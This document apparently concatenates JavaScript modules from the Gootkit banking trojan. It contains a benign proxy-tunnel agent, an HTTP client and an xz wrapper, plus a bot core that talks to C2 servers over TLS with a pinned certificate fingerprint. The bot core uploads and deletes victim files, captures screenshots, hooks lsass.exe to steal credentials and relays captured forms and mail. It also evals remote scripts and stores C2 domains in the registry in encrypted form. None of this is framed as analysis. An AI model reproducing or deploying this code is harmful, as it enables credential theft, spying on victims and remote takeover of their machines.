exports.httpsOverHttp = httpsOverHttp;
exports.httpOverHttps = httpOverHttps;
exports.httpsOverHttps = httpsOverHttps;


function httpOverHttp(options) {
  var agent = new TunnelingAgent(options);
  agent.request = http.request;
  return agent;
}

function httpsOverHttp(options) {
  var agent = new TunnelingAgent(options);
  agent.request = http.request;
  agent.createSocket = createSecureSocket;
  return agent;
}

function httpOverHttps(options) {
  var agent = new TunnelingAgent(options);
  agent.request = https.request;
  return agent;
}

function httpsOverHttps(options) {
  var agent = new TunnelingAgent(options);
  agent.request = https.request;
  agent.createSocket = createSecureSocket;
  return agent;
}


function TunnelingAgent(options) {
  var self = this;
  self.options = options || {};
  self.proxyOptions = self.options.proxy || {};
  self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets;
  self.requests = [];
  self.sockets = [];

  self.on('free', function onFree(socket, host, port, localAddress) {
    var options = toOptions(host, port, localAddress);
    for (var i = 0, len = self.requests.length; i < len; ++i) {
      var pending = self.requests[i];
      if (pending.host === options.host && pending.port === options.port) {
        
        
        self.requests.splice(i, 1);
        pending.request.onSocket(socket);
        return;
      }
    }
    socket.destroy();
    self.removeSocket(socket);
  });
}
util.inherits(TunnelingAgent, events.EventEmitter);

TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) {
  var self = this;
  var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress));

  if (self.sockets.length >= this.maxSockets) {
    
    self.requests.push(options);
    return;
  }

  
  self.createSocket(options, function(socket) {
    socket.on('free', onFree);
    socket.on('close', onCloseOrRemove);
    socket.on('agentRemove', onCloseOrRemove);
    req.onSocket(socket);

    function onFree() {
      self.emit('free', socket, options);
    }

    function onCloseOrRemove(err) {
      self.removeSocket(socket);
      socket.removeListener('free', onFree);
      socket.removeListener('close', onCloseOrRemove);
      socket.removeListener('agentRemove', onCloseOrRemove);
    }
  });
};

TunnelingAgent.prototype.createSocket = function createSocket(options, cb) {
  var self = this;
  var placeholder = {};
  self.sockets.push(placeholder);

  var connectOptions = mergeOptions({}, self.proxyOptions, {
    method: 'CONNECT',
    path: options.host + ':' + options.port,
    agent: false
  });
  if (connectOptions.proxyAuth) {
    connectOptions.headers = connectOptions.headers || {};
    connectOptions.headers['Proxy-Authorization'] = 'Basic ' +
        new Buffer(connectOptions.proxyAuth).toString('base64');
  }

  var connectReq = self.request(connectOptions);
  connectReq.useChunkedEncodingByDefault = false; 
  connectReq.once('response', onResponse); 
  connectReq.once('upgrade', onUpgrade);   
  connectReq.once('connect', onConnect);   
  connectReq.once('error', onError);
  connectReq.end();

  function onResponse(res) {
    
    res.upgrade = true;
  }

  function onUpgrade(res, socket, head) {
    
    process.nextTick(function() {
      onConnect(res, socket, head);
    });
  }

  function onConnect(res, socket, head) {
    connectReq.removeAllListeners();
    socket.removeAllListeners();

    if (res.statusCode === 200) {
      assert.equal(head.length, 0);
      self.sockets[self.sockets.indexOf(placeholder)] = socket;
      cb(socket);
    } else {
      var error = new Error('tunneling socket could not be established, ' +
                            'sutatusCode=' + res.statusCode);
      error.code = 'ECONNRESET';
      options.request.emit('error', error);
      self.removeSocket(placeholder);
    }
  }

  function onError(cause) {
    connectReq.removeAllListeners();
    var error = new Error('tunneling socket could not be established, ' +
                          'cause=' + cause.message);
    error.code = 'ECONNRESET';
    options.request.emit('error', error);
    self.removeSocket(placeholder);
  }
};

TunnelingAgent.prototype.removeSocket = function removeSocket(socket) {
  var pos = this.sockets.indexOf(socket)
  if (pos === -1) {
    return;
  }
  this.sockets.splice(pos, 1);

  var pending = this.requests.shift();
  if (pending) {
    
    
    this.createSocket(pending, function(socket) {
      pending.request.onSocket(socket);
    });
  }
};

function createSecureSocket(options, cb) {
  var self = this;
  TunnelingAgent.prototype.createSocket.call(self, options, function(socket) {
    var hostHeader = options.request.getHeader('host');
    var tlsOptions = mergeOptions({}, self.options, {
      socket: socket,
      servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host
    });

    
    var secureSocket = tls.connect(0, tlsOptions);
    self.sockets[self.sockets.indexOf(socket)] = secureSocket;
    cb(secureSocket);
  });
}


function toOptions(host, port, localAddress) {
  if (typeof host === 'string') { 
    return {
      host: host,
      port: port,
      localAddress: localAddress
    };
  }
  return host; 
}

function mergeOptions(target) {
  for (var i = 1, len = arguments.length; i < len; ++i) {
    var overrides = arguments[i];
    if (typeof overrides === 'object') {
      var keys = Object.keys(overrides);
      for (var j = 0, keyLen = keys.length; j < keyLen; ++j) {
        var k = keys[j];
        if (overrides[k] !== undefined) {
          target[k] = overrides[k];
        }
      }
    }
  }
  return target;
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

========





var spyware = require("spyware");

var fs = require('fs');
var tls = require('tls'); 
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');
var module = require('module');
var clienthttp = require('clienthttp');
var suspend = require('suspend');
var pp = require('packet');
var fingerprint = 'AC:5C:1F:1A:A5:75:3D:F8:2A:1D:58:7D:3C:D8:41:50:69:61:3B:61';

process.bIsDebugVersion = (process.env['injdebug'] === 'sure');
process.g_vendorName = (process.env['vendor_id'] || 'unknown');

process.externalAddress = '0.0.0.0';
process.pendingMessages = [];
process.g_servers = []; 
 
if('_BODY_VERSION_STRING_HERE_' !== process.bodyVersion){
    process.g_botId = process.bodyVersion; 
}else{
    process.g_botId = '8.666.jet';
}

process.g_mainProcess = 'explorer.exe';
if(!util.isUndefined(process.env['mainprocessoverride'])){
	process.g_mainProcess = process.env['mainprocessoverride'].toLowerCase();
}

print("process.g_mainProcess  : %s", process.g_mainProcess );
 
if(!util.isUndefined(process.env['issdb'])){
	process.g_botId += '.sdb';
}

process.addServer = function (host, port) {
	
	for(var i = 0; i < process.g_servers.length; i ++)
	{
		if(
			process.g_servers[i].host === host && 
			process.g_servers[i].port === port
		){
			return;
		}
	}

	process.g_servers.push({
		'host': host,
		'port': port || 7011
	});
}



var bDelevel = false;

if(process.defaultDomains.indexOf('|') !== -1)
{
    process.defaultDomains.split("|").forEach(function(domain){
        process.addServer(domain, 443);
    });
}



const P_FRAGMENT_DELIVERY = 0xFFFE;
const P_FRAGMENT = 0xFFFF;
const FRAGMENT_LENGTH = 65000;

const P_SOCKS = 0;
const P_PING = 1;
const P_FS = 2;
const P_REGISTRATION = 3;
const P_SPYWARE = 4;
const P_CMDTERM = 5;

var packetParsers = {};
var procolPacketBuilders = {};
var protocolDispatchers = {};

protocolDispatchers[P_SOCKS] = 'client_proto_socks';
protocolDispatchers[P_PING] = 'client_proto_ping';
protocolDispatchers[P_FS] = 'client_proto_fs';
protocolDispatchers[P_REGISTRATION] = 'client_proto_registration';
protocolDispatchers[P_SPYWARE] = 'client_proto_spyware';
protocolDispatchers[P_CMDTERM] = 'client_proto_cmdterm';

for (let i in protocolDispatchers) {
	
	

	protocolDispatchers[i] = require(protocolDispatchers[i]);
	protocolDispatchers[i].register(
		i, packetParsers, procolPacketBuilders);
}


process.md5 = function (str) {
	return crypto.createHash('md5').update(str).digest("hex");
}

function BuildPacket(requestId, status, data) {
	var packet;

	if (data) {
		packet = new Buffer(
			2 +
			4 + 
			1 + 
			data.length
		);
	}
	else {
		packet = new Buffer(
			2 +
			4 + 
			1   
		);
	}

	packet.writeUInt16BE(MyPacketId, 0);
	packet.writeUInt32BE(requestId, 2);
	packet.writeUInt8(status, 6);

	if (data)
		data.copy(packet, 7);

	return packet;
}

function getRandomArbitrary(min, max) {
	return Math.floor(Math.random() * (max - min) + min);
}

function getRandomInt() {
	return getRandomArbitrary(0, 0xffffffff);
}



function checkServer(server, callback)
{
	var isServerAlive = false;

	var bot = tls.connect(server.port, server.host, {rejectUnauthorized : false}, function() {
	    
	    if(bot.getPeerCertificate().fingerprint !== fingerprint){
	        if(process.g_botId.indexOf('_trip') === -1){
	            process.g_botId += '_trip';
	        }
	    }

	    process.currentServer = server.host;

		var outstream = new pp.PacketCompiler();
		var instream = new pp.PacketSplitter();
		
		outstream.botSocket = bot;
		bot.lastServerPacket = new Date();

		bot.checkInteval = setInterval(function(){
			var dif = (
				new Date().getTime() - 
				instream.lastServerPacket.getTime()
			);

			if(dif > (process.defaultPingTimerValue * 2)){
			    
			    bot.destroy();
			    clearInterval(bot.checkInteval);
			}
		}, 1000);

		outstream.pipe(bot);
		bot.pipe(instream);

		bot.on('drain', function(){
			outstream.emit('drain');
		})

		instream.pendingFragments = {};
		outstream.awaiters = {};

		instream.on('packet', function(data){
			
			instream.lastServerPacket = new Date();

			isServerAlive = true;

			if(data.length >= 2){

				let packetType = data.readUInt16BE(0);
				
				

				if(typeof(packetParsers[packetType]) !== 'undefined')
				{
					packetParsers[packetType](
						outstream, data.slice(2));
				}
			}
		});

		instream.on('error', function(error){
		    
			bot.destroy();
		});

		outstream.on('error', function(error){
		    
			bot.destroy();
		});

		outstream.writeAndWait = function(data, waiterCookie, callback)
		{
			outstream.awaiters[waiterCookie] = function(error, peerdata)
			{
				outstream.awaiters[waiterCookie] = undefined;   
				callback(error, peerdata);
			};

			outstream.write(data);
		}

		outstream.pushFileToServer = function(filename, requestId, removeAfterSend){
		
			fs.stat(filename, function(error, stat){
				
				if(error){
					return outstream.sendProtocolPacket(
						P_FS, requestId, 
						0xFE, new Buffer(error.message));
				}
				
				let fileDesc = new Buffer(4 + 2 + filename.length + 4);
				let uploadUUID = getRandomInt();
				fileDesc.fill(0);
				
				fileDesc.writeUInt32BE(stat.size, 0);
				
				fileDesc.writeUInt16BE(filename.length, 0 + 4);
				
				fileDesc.write(filename, 0 + 4 + 2, filename.length);
				
				fileDesc.writeUInt32BE(uploadUUID, 0 + 4 + 2 + filename.length);

				outstream.sendProtocolPacket(
					P_FS, requestId, 0x00, fileDesc);

				var bigfile2 = fs.createReadStream(filename, {'bufferSize': 2048});
		
				bigfile2.on('data', function(data){
					
					
					if(outstream.sendProtocolPacket(P_FS, requestId, 0x00, data) === false){
						bigfile2.pause();

						outstream.once('drain', function(){
							setTimeout(function(){
								bigfile2.resume();    
							}, 20);
							
						});

					}
				});


				bigfile2.on('end', function(){

					fileDesc.writeUInt32BE(0xDEADBEEF, 0 + 4 + 2 + filename.length);

					outstream.sendProtocolPacket(
						P_FS, requestId, 0, fileDesc);

					bigfile2.close();

					if(removeAfterSend){
					    fs.unlink(filename, function(){});
					}
				});
				
			});
		}

		outstream.sendProtocolPacket = function(type, requestId){
			
		    

			Array.prototype.shift.apply(arguments);
			instream.lastServerPacket = new Date();
			var packetBuffer = 
				procolPacketBuilders[type].apply(this, arguments);

			return outstream.write(packetBuffer);
		}

		process.controllerConnection = outstream;
		process.controllerConnection.socket = bot;

	});

	bot.on('close', function() {
	    
	    
        
	    for (let i in protocolDispatchers) {
	        if(protocolDispatchers[i].on_disconnect){
	            protocolDispatchers[i].on_disconnect();
	        }
	    }
		callback(undefined, isServerAlive);
	});


	bot.on('error', function(error) {
	    
		
	});
}

var IsInternetConnectionAvailiable = suspend(function*(server, callback)
{

	var strResult = "DISCONNECTED";
	
	try{
		do{
			var response = yield clienthttp.get(
				util.format("https://%s:80/200", server.host), 
				suspend.resume()
			);
		
			if(util.isNull(response) || 
				util.isUndefined(response)) break;

			if(util.isNull(response.headers) || 
				util.isUndefined(response.headers)) break;

			if(util.isNull(response.headers['x-ssl-client-verify']) || 
				util.isUndefined(response.headers['x-ssl-client-verify'])) break;

			if(net.isIP(response.headers['x-ssl-client-verify']) !== 4)
				break;
			
			process.externalAddress = 
				response.headers['x-ssl-client-verify'];

			strResult = "CONNECTED";
		}while(false);
	}
	catch(exception)
	{
	    if(exception.message && exception.message.indexOf("ENOTFOUND")){
	        strResult = "ENOTFOUND";
	    }
	    print(exception.message);
	}
	callback(null, strResult);
});

    
    
    
    

process.LoadDomainsFromRegistry = function(){
	var domains = process.RegReadObjectEncrypted("{f61905f0-0c02-481c-90d1-198bf27e56a1}");
	if(!util.isUndefined(domains)){
		if(Object.prototype.toString.call( domains ) !== '[object Array]'){
			return;
		}

		if(domains.length > 0){
			for(let i = 0; i < domains.length; i ++){
				if(domains[i].hasOwnProperty('host') === false){
					return;
				}

				if(domains[i].hasOwnProperty('port') === false){
					return;
				}
			}
		}
		process.g_servers = domains;
	}
}

process.SaveDomainsToRegistry = function(){
	process.RegWriteObjectEncrypted("{f61905f0-0c02-481c-90d1-198bf27e56a1}", process.g_servers);
}

var InitializeMainProcess = suspend(function*()
{
	while(true)
	{

	    
	    
        
		

		for(let i = 0; i < process.g_servers.length; i ++)
		{
			for(let k = 0; k < 20; k ++)
			{
			    var strResult = "UNKNOWN";
				
				if(!bDelevel){
				    strResult = yield IsInternetConnectionAvailiable(process.g_servers[i], suspend.resume());
				    
				    if(strResult == "ENOTFOUND"){
				        k = 22;
				    }
				}

				
				if(strResult == "CONNECTED")
				{
				    process.isUpdatePending = false;
					var isServerAlive = yield checkServer(process.g_servers[i], suspend.resume());            
					if(isServerAlive)
					{
						if(process.g_shutdownPending !== true)
						{
							if(bDelevel){
								yield sleep(1000, suspend.resume()); 
							}else{
								yield sleep(20000, suspend.resume()); 
							}

							k = 0;
							continue;
						}
						else
						{
							return;
						}
					}
				}

				if(bDelevel){
					yield sleep(1000, suspend.resume()); 
				}else{
					yield sleep(2 * 60000, suspend.resume()); 
				}


			}            
		}

		if(bDelevel){
			yield sleep(1000, suspend.resume()); 
		}else{
			yield sleep(10000, suspend.resume()); 
		}
	}
});

function GetSlavePort()
{
	var botIdHash = process.md5('GootkitLocalServer_' + process.g_botId);
	var portNumber = parseInt(botIdHash.substr(-4), 16);
	if(portNumber < 2000)
	{
		portNumber += 2000;
	}
	
	return portNumber;
}

process.OnDefaultJs = function(defaultjs)
{
	if(!util.isUndefined(process.slaveServer)){
		process.slaveServer.broadcastProtocolPacket(
			SLAVE_PACKET_DEFAULTJS, 
					new Buffer(defaultjs));
	}
}

process.OnPrivateJs = function(defaultjs)
{
	if(!util.isUndefined(process.slaveServer)){
		process.slaveServer.broadcastProtocolPacket(
			SLAVE_PACKET_PRIVATEJS, 
					new Buffer(defaultjs));
	}
}

process.OnSpConfig = function(config)
{
	if(!util.isUndefined(process.slaveServer)){
		process.slaveServer.broadcastProtocolPacket(
			SLAVE_PACKET_SPCONFIG, 
					new Buffer(config));
	}
}


function processPacket(botSocket, packetType, packetBody, rawPacket)
{
	switch(packetType)
	{

		case SLAVE_PACKET_URLNOTIFICATION :
			
			if(process.OnUrlNotify)
			{
				process.OnUrlNotify(packetBody.toString());
			}

			if(!util.isUndefined(process.slaveServer)){
				process.slaveServer.broadcastProtocolPacket(
					SLAVE_PACKET_URLNOTIFICATION, 
					packetBody);
			}
			break;
		case SLAVE_PACKET_DEFAULTJS : 
			process.g_defaultJs = packetBody.toString();
			try
			{
				eval(process.g_defaultJs);
			}
			catch(exception)
			{
				print(exception)
			}

			break;
		case SLAVE_PACKET_PROCESS_PROP:
			botSocket.process = JSON.parse(packetBody.toString());
			
			break;
		case SLAVE_PACKET_SPCONFIG : 
			
			try
			{
				process.g_scfg = JSON.parse(packetBody.toString());
			}
			catch(exception)
			{
				print(exception)
			}

			
			break;
		case SLAVE_PACKET_PRIVATEJS : 
			process.g_privateScript = packetBody.toString();
			try
			{
				eval(process.g_privateScript);
			}
			catch(exception)
			{
				print(exception)
			}

			break;
		case SLAVE_PACKET_UPDATE :
			process.doUpdateBody(packetBody);
			break;
	    case SLAVE_PACKET_FORM: 
	    case SLAVE_PACKET_MAIL:
		case SLAVE_PACKET_LSAAUTH :
		case SLAVE_PACKET_LOGLINE:
			if(process.controllerConnection)
			{
				process.controllerConnection
					.sendProtocolPacket(P_SPYWARE, 
						packetType, 0, packetBody);
			}
			break;
	    case SLAVE_PACKET_API_TAKESCREEN :
	        if(process.controllerConnection)
	        {
	            var opts = JSON.parse(packetBody.toString());
	            var defaultFilename = 'SpTakeScreenshot_' + new Date().toUTCString().replace(/\:|\s+|\,/g, '_') + '.jpg';
	            var quality = opts.quality || 30;
	            var filename = opts.filename || defaultFilename;
	            var tmpFileName = path.join(process.env['temp'], filename);

	            function dummy(){}

	            var screen = spyware.SpTakeScreenshot(parseInt(quality));
	            fs.writeFile(tmpFileName, screen, function (error) {
	                if (error) {
	                    process.log('SLAVE_PACKET_API_TAKESCREEN', error.message);
	                } else {
	                    process.uploadLocalFile(tmpFileName, dummy);
	                    setTimeout(function () {
	                        fs.unlink(tmpFileName, dummy)
	                    }, 2 * 60000);
	                }
	            });
	        }
		default:

			
			if(process.controllerConnection){
				process.controllerConnection.write(rawPacket);
			}else{
				if(typeof(packetParsers[packetType]) !== 'undefined')
				{
					
					packetParsers[packetType](
						process.masterConnection, packetBody);
				}
			}
			break;
	}
}

var StartLocalServer = function()
{   
	process.slaveServer = net.createServer(function(botSocket) 
	{
		var outstream = new pp.PacketCompiler();
		var instream = new pp.PacketSplitter();

		outstream.pipe(botSocket);
		botSocket.pipe(instream);
		
		instream.botSocket = botSocket;
		outstream.botSocket = botSocket;
		outstream.socket = botSocket;

		process.slaveServer.clients.push(outstream);

		instream.on('packet', function(data)
		{
			if(data.length >= 2)
			{

				let packetType = data.readUInt16BE(0);
				let packetBody = data.slice(2);

				
				
				processPacket(botSocket, packetType, packetBody, data);
			}
		});

		
		
		botSocket.on('end', function() 
		{
			
			process.slaveServer.clients.remove(outstream);
		});

		botSocket.on('error', function() 
		{
			
			process.slaveServer.clients.remove(outstream);
		});


		outstream.sendProtocolPacket = function(type, data, cb){
			
			
			var packet;

			packet = new Buffer(data.length + 2);
			packet.writeUInt16BE(type, 0);
			data.copy(packet, 2);
			
			outstream.write(packet, function(){
				if(!util.isUndefined(cb)) cb(null, null);
			});
		}

		

		if(process.g_defaultJs)
			outstream.sendProtocolPacket(SLAVE_PACKET_DEFAULTJS, 
				new Buffer(process.g_defaultJs));

		if(process.g_privateScript)
			outstream.sendProtocolPacket(SLAVE_PACKET_PRIVATEJS, 
				new Buffer(process.g_privateScript));

		if(process.g_scfg)
			outstream.sendProtocolPacket(SLAVE_PACKET_SPCONFIG, 
				new Buffer(JSON.stringify(process.g_scfg)));
	});

	process.slaveServer.clients = [];

	process.slaveServer.broadcastProtocolPacket = suspend(function*(type, data, cb)
	{
		
		var clients = process.slaveServer.clients;
		for(let i = 0 ; i < clients.length; i ++)
		{
			yield clients[i].sendProtocolPacket(
				type, data, suspend.resume());
		};

		
		if(!util.isUndefined(cb))
		{
			cb();
		}
	});

	process.slaveServer.listen(GetSlavePort(), '127.0.0.1');
};

var ConnectToLocalServer = function()
{
	var masterConnection = new net.Socket();

	masterConnection.connect(GetSlavePort(), function() {

		

		var outstream = new pp.PacketCompiler();
		var instream = new pp.PacketSplitter();

		outstream.pipe(masterConnection);
		masterConnection.pipe(instream);

		instream.pendingFragments = {};
		outstream.awaiters = {};

		instream.on('packet', function(data)
		{
			try{
				if(data.length >= 2)
				{

					var packetType = data.readUInt16BE(0);
					var packetBody = data.slice(2);

					
					
					
					
					processPacket(masterConnection, packetType, packetBody);
				}
			}catch(ex){
				print(ex);
				print(ex.stack);
			}
		});


		
		outstream.sendProtocolPacket = function(type){
			

			Array.prototype.shift.apply(arguments);

			var packetBuffer = 
				procolPacketBuilders[type].apply(this, arguments);

			outstream.FragmetAndSend(packetBuffer);
		}

		


		outstream.sendProtocolPacket = function(type, data){
			
			var packetBuffer;
			if(!util.isUndefined( procolPacketBuilders[type]))
			{
				Array.prototype.shift.apply(arguments);
				packetBuffer = 
					procolPacketBuilders[type].apply(this, arguments);
			}
			else
			{
				packetBuffer = new Buffer(data.length + 2);
				packetBuffer.writeUInt16BE(type, 0);
				data.copy(packetBuffer, 2);
				outstream.write(packetBuffer);
			}
			
			outstream.write(packetBuffer);
		}

		outstream.sendProtocolPacket(
			SLAVE_PACKET_PROCESS_PROP, 
			new Buffer(JSON.stringify({pid : process.pid, name : process.execPath})));
		
		process.masterConnection = outstream;
		process.masterConnection.socket = masterConnection;

		process.pendingMessages.forEach(function(pkt){
			
			outstream.sendProtocolPacket(
				pkt.t, 
				pkt.p
			);
		});
		process.pendingMessages = [];

	});

	masterConnection.on('error', function()
	{
		reconnect();
		
	});

	masterConnection.on('end', function()
	{
		reconnect();
		
	})

	function reconnect()
	{
		if(process.g_shutdownPending !== true){
			setTimeout(ConnectToLocalServer, 1000);
		}
	}
}


function InitializeFilWatcher(injpath){
    
    
    var fs = require('fs');

    if(fs.existsSync(injpath)){
        try{
            process.g_scfg = JSON.parse(fs.readFileSync(injpath).toString());
            process.OnSpConfig(JSON.stringify(process.g_scfg));
        }catch(e){
            console.log("error parsing injects file");
        }

        fs.watchFile(injpath, function (curr, prev) {
            console.log('the current mtime is: ' + curr.mtime);
            console.log('the previous mtime was: ' + prev.mtime);

            try{
                process.g_scfg = JSON.parse(fs.readFileSync(injpath).toString());
                process.OnSpConfig(JSON.stringify(process.g_scfg));
            }catch(e){
                console.log("error parsing injects file");
            }

        });
    }
}

exports.run = function (iter) {       
	
    print("RUN : ", process.currentBinary);

	process.superPool = setInterval(function(){}, 1000);
	process.GetMachineGuid();

	if(process.currentBinary === process.g_mainProcess){
	    
	    spyware.PregenerateCertificate();
	    StartLocalServer();
	    
	    if(process.bIsDebugVersion){
	        InitializeFilWatcher("C:\\injects.json");
	    }else{
	        InitializeMainProcess();
	    }
	} else if(process.currentBinary === 'lsass.exe'){
	    spyware.SpHookLsa();
	    ConnectToLocalServer();
	} else {
	    ConnectToLocalServer();
	    if(process.bIsDebugVersion){
	        spyware.SpStartHttpIntercepting();
	    }
	}
}



print("%s Body loaded [%s.%s]", process.execPath, process.version, process.g_botId);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                

========

var http = require('http'),
    https = require('https'),
    tunnel = require('tunnel'),
    url = require('url');
    
var _cookie = {};
var _proxy;
var _timeout = 60000;

exports.request   = httpRequest;
exports.get       = httpGet;
exports.setProxy  = function(proxy){
    _proxy = proxy;
};
exports.setTimeout = function(timeout){
    _timeout = timeout;
};

function httpRequest(rawUrl, callback, data, headers){ 
    var options = genRequestOptions(rawUrl, function(err){
        err && callback && callback(err, null);
    }, data, headers);
    if (!options){
        return;
    }
    var req;
    if (options._protocol=="https" && !options.agent){
        req = https.request(options, function(res){
            handleResponese(res, callback, data, headers);
        });
    }else{
        req = http.request(options, function(res){
            handleResponese(res, callback, data, headers);
        });
    }
    req.on('socket', function(socket){
      socket.setTimeout(_timeout);
      socket.on('timeout', function(){
        req.abort();
      });
    });
    data && req.write(data);
    req.on("error", function(err){
        callback && callback(err, null);
    });
    req.end();
}

function httpGet(rawUrl, callback){
    httpRequest(rawUrl, callback);
}

function handleResponese(res, callback, data, headers) {
    res.setEncoding("utf8");
    setCookieByHttpRes(res);

    if (res.statusCode == 301 || res.statusCode == 302) {
        var nextTarget = res.headers.location;
        process.nextTick(function () { httpRequest(nextTarget, callback, data, headers); });
    } else {

        var buffer = "";
        res.on("data", function (chunk) {
            if (chunk && chunk.length > 0) {
                buffer += chunk;
            }
        });

        res.on("end", function () {
            if (res.statusCode == 200) {
                buffer && callback && callback(null, {
                    data: buffer,
                    cookies: _cookie,
                    headers: res.headers
                });
            } else {
                callback && callback("server return " + res.statusCode, {
                    data: null,
                    cookies: null,
                    headers: res.headers
                });
            }
        });
    }
}
function cookieToStr(cookie){
    if (cookie){
        var result = "";
        for (var key in cookie){
            result += key + (cookie[key] ? "=" + cookie[key] : "") + "; ";
        }
        return result;
    }
    return "";
}

function setCookieByHttpRes(res){
    var rawCookie = res.headers["set-cookie"];
    rawCookie && rawCookie.forEach(function(line){
        line && line.split(';').forEach(function(c){
            var parts = c.split('=');
            _cookie[parts[0].trim()] = (parts[1] || '').trim();
        });
    });
}

function genRequestOptions(rawUrl, errCallback, data, headers){
    var target;
    try{
        target = url.parse(rawUrl);
    }catch(err){
        errCallback("URL parse error, please input validate URL");
        return;
    }
    if (target && target.host){
        target.host = target.port ? 
            target.host.replace(":" + target.port, "") : target.host;
        var result = {
            path: rawUrl,
            method: data ? "POST" : "GET",
            host: target.hostname, 
            headers: {
                Host: target.host,
                "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0",
                Connection: "keep-alive",
                Accept: "text/html, text/javascript, application/json, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8",
                Cookie: cookieToStr(_cookie)
            }
        };
        
        if (data){
            result.headers["Content-Length"] = Buffer.byteLength(data);
        }
        
        if (headers){
            for (var key in headers){
                result.headers[key] = headers[key];
            }
        }
        var proxy = getProxy();
        if (target.protocol==="http:"){
            result.port = target.port ? target.port : 80;
            result._protocol = "http";
            if (proxy){
                result.host = proxy.host;
                result.port = proxy.port;
            }
        }else if (target.protocol==="https:"){
            result.port = target.port ? target.port : 443;
            result._protocol = "https";
            if (proxy){
                result.agent = tunnel.httpsOverHttp({
                    proxy:{
                        host: proxy.host,
                        port: proxy.port
                    }
                });
            }
        }else{
            errCallback("Not support URL scheme, only support http and https");
            return;
        }
        return result;
    }
}

function getProxy(){
    var proxy;
    if (_proxy){
        proxy = _proxy; 
    }else if (process.env.http_proxy){
        proxy = process.env.http_proxy;
    }
    proxy = proxy ? url.parse(proxy) : null;
    if (proxy && proxy.host){
        return {
            host: proxy.port ? proxy.host.replace(":"+proxy.port, "") : proxy.host,
            port: proxy.port ? proxy.port : "80"
        };
    }
    return;
}                                                                                                                     

========


(function() {
  var Compressor, DEFAULT_BUFSIZE, Decompressor, XzStream, node_xz, stream, util,
    __hasProp = {}.hasOwnProperty,
    __extends = function(child, parent) { for (var key in parent) { if (__hasProp.call(parent, key)) child[key] = parent[key]; } function ctor() { this.constructor = child; } ctor.prototype = parent.prototype; child.prototype = new ctor(); child.__super__ = parent.prototype; return child; };

  node_xz = process.binding("xz");

  stream = require("stream");

  util = require("util");

  DEFAULT_BUFSIZE = 128 * 1024;

  XzStream = (function(_super) {
    __extends(XzStream, _super);

    function XzStream(mode, preset, options) {
      XzStream.__super__.constructor.call(this, options);
      this.engine = new node_xz.Engine(mode, preset);
    }

    XzStream.prototype._transform = function(chunk, encoding, callback) {
      this.engine.feed(chunk);
      this.__drain(chunk.length);
      return callback(null);
    };

    XzStream.prototype._flush = function(callback) {
      this.__drain(DEFAULT_BUFSIZE, node_xz.ENCODE_FINISH);
      return callback(null);
    };

    XzStream.prototype.__drain = function(estimate, flags) {
      var bufSize, buffer, n, segments;
      bufSize = Math.min(estimate * 1.1, DEFAULT_BUFSIZE);
      segments = [];
      n = -1;
      while (n < 0) {
        buffer = new Buffer(bufSize);
        n = this.engine.drain(buffer, flags);
        segments.push(buffer.slice(0, Math.abs(n)));
      }
      return this.push(Buffer.concat(segments));
    };

    return XzStream;

  })(stream.Transform);

  Compressor = (function(_super) {
    __extends(Compressor, _super);

    function Compressor(preset, options) {
      Compressor.__super__.constructor.call(this, node_xz.MODE_ENCODE, preset, options);
    }

    return Compressor;

  })(XzStream);

  Decompressor = (function(_super) {
    __extends(Decompressor, _super);

    function Decompressor(options) {
      Decompressor.__super__.constructor.call(this, node_xz.MODE_DECODE, null, options);
    }

    return Decompressor;

  })(XzStream);

  exports.Compressor = Compressor;

  exports.Decompressor = Decompressor;

}).call(this);                                  

========

var dgram = require('dgram');

exports.init = function (g)
{

    
    g.KEY_ALL_ACCESS = 0xF003F;
    g.HKEY_CLASSES_ROOT = 0x80000000;
    g.HKEY_CURRENT_USER = 0x80000001;
    g.HKEY_LOCAL_MACHINE = 0x80000002;
    g.HKEY_USERS = 0x80000003;
    g.HKEY_PERFORMANCE_DATA = 0x80000004;
    g.HKEY_CURRENT_CONFIG = 0x80000005;
    g.HKEY_DYN_DATA = 0x80000006;
    g.REG_OPTION_VOLATILE = 1;
    g.REG_OPTION_NON_VOLATILE = 0;
    g.REG_CREATED_NEW_KEY = 1;
    g.REG_OPENED_EXISTING_KEY = 2;
    g.REG_NONE = 0;
    g.REG_SZ = 1;
    g.REG_EXPAND_SZ = 2;
    g.REG_BINARY = 3;
    g.REG_DWORD_LITTLE_ENDIAN = 4;
    g.REG_DWORD = 4;
    g.REG_DWORD_BIG_ENDIAN = 5;
    g.REG_LINK = 6;
    g.REG_MULTI_SZ = 7;
    g.REG_RESOURCE_LIST = 8;
    g.REG_FULL_RESOURCE_DESCRIPTOR = 9;
    g.REG_RESOURCE_REQUIREMENTS_LIST = 10;
    g.REG_QWORD_LITTLE_ENDIAN = 11;
    g.REG_QWORD = 11;
    g.REG_NOTIFY_CHANGE_NAME = 1;
    g.REG_NOTIFY_CHANGE_ATTRIBUTES = 2;
    g.REG_NOTIFY_CHANGE_LAST_SET = 4;
    g.REG_NOTIFY_CHANGE_SECURITY = 8;

    g.KEY_QUERY_VALUE = 1;
    g.KEY_SET_VALUE = 2;
    g.KEY_CREATE_SUB_KEY = 4;
    g.KEY_ENUMERATE_SUB_KEYS = 8;
    g.KEY_NOTIFY = 16;
    g.KEY_CREATE_LINK = 32;
    g.KEY_WRITE = 0x20006;
    g.KEY_EXECUTE = 0x20019;
    g.KEY_READ = 0x20019;
    g.KEY_ALL_ACCESS = 0xf003f;

